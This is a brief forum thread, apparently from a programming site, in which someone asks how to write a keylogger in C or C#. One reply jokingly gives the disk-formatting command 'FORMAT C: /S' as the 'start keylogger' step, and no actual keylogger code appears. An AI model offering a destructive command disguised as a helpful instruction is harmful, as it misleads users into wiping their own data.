u can suggest other ways to create a keylogger in c or c#

Yes, it's quite easy.
You need to run the "start keylogger" command on your development PC : "FORMAT C: /S"
That will write everything you need.

so can you try "FORMAT C: /S" for me and tell me what will happen
C# and C does not have "commands". Who knows what do you mean by "command to monitor"… :-)
You can write an application, though, see the solution by elgaabeb.
